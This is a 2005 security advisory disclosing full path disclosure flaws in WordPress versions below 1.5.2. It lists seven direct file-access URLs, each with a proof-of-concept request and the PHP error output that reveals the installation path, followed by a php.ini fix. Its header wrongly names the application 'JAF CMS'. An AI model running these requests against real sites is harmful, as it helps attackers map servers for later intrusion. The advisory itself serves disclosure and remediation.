WordPress versions less than 1.5.2 suffer from a full path disclosure vulnerability.
626b96e62c1bbb752059b1d5b069a1c5b3997b53b9a508350b7f65ef793b6b62
ECHO.OR.ID
ECHO_ADV_24$2005
---------------------------------------------------------------------------
[ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2
---------------------------------------------------------------------------
Author: Dedi Dwianto
Date: Dec, 20th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv24-theday-2005.txt
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : JAF CMS
version: < 1.5.2
URL : http://wordpress.org/
Description :
WordPress is a very popular personal publishing platform aka blog
software, and is used by everyone from celebrities, to government
officials, to non technical average joe's.
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Full path disclosure:
A remote user can access the file directly to cause the system to display
an error message that indicates the installation path. The resulting error
message will disclose potentially sensitive installation path information
to the remote attacker.
* http://victim/[WP Folder]/wp-includes/vars.php?PHP_SELF%20=dudul
POC :
http://localhost/blog/wp-includes/vars.php?PHP_SELF%20=dudul
Fatal error: Call to undefined function: get_settings() in
/var/www/html/blog/wp-includes/vars.php on line 106
* http://victim/[WP Folder]/wp-content/plugins/hello.php
POC :
http://localhost/blog/wp-content/plugins/hello.php
Fatal error: Call to undefined function: wptexturize() in
/var/www/html/blog/wp-content/plugins/hello.php on line 44
* http://victim/[WP Folder]/wp-admin/menu-header.php?self=dudul
POC :
http://localhost/blog/wp-admin/menu-header.php?self=dudul
PHP Fatal error: Call to undefined function: get_admin_page_parent() in
/var/www/html/blog/wp-admin/menu-header.php on line 6
Fatal error: Call to undefined function: get_admin_page_parent() in
/var/www/html/blog/wp-admin/menu-header.php on line 6
* http://victim/[WP Folder]/wp-admin/upgrade-functions.php
POC :
http://localhost/[WP Folder]/wp-admin/upgrade-functions.php
Warning: main(ABSPATH/wp-admin/admin-functions.php): failed to open stream: No such file or directory
in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3
PHP Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php'
(include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3
Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php'
(include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3
* http://victim/[WP FOlder]/wp-admin/edit-form.php
POC :
http://localhost/blog/wp-admin/edit-form.php
PHP Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3
Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3
* http://victim/[WP FOlder]/wp-settings.php
POC : http://localhost/blog/wp-settings.php
Warning: main(ABSPATHwp-includes/wp-db.php): failed to open stream: No such file or directory in
/var/www/html/blog/wp-settings.php on line 59
PHP Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php'
(include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59
Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php'
(include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59
* http://victim/[WP FOlder]/wp-admin/edit-form-comment.php
POC :
http://localhost/blog/wp-admin/edit-form-comment.php
Fatal error: Call to undefined function: __() in /var/www/html/blog/wp-admin/edit-form-comment.php on line 2
B. Fix
For User and do not know how to fix the script , change php.ini file setting
then turn on log_errors , and turn off display_error
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ newbie_hacker@yahoogroups.com
~ #e-c-h-o@DALNET
---------------------------------------------------------------------------
Contact:
~~~~~~~~
the_day || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------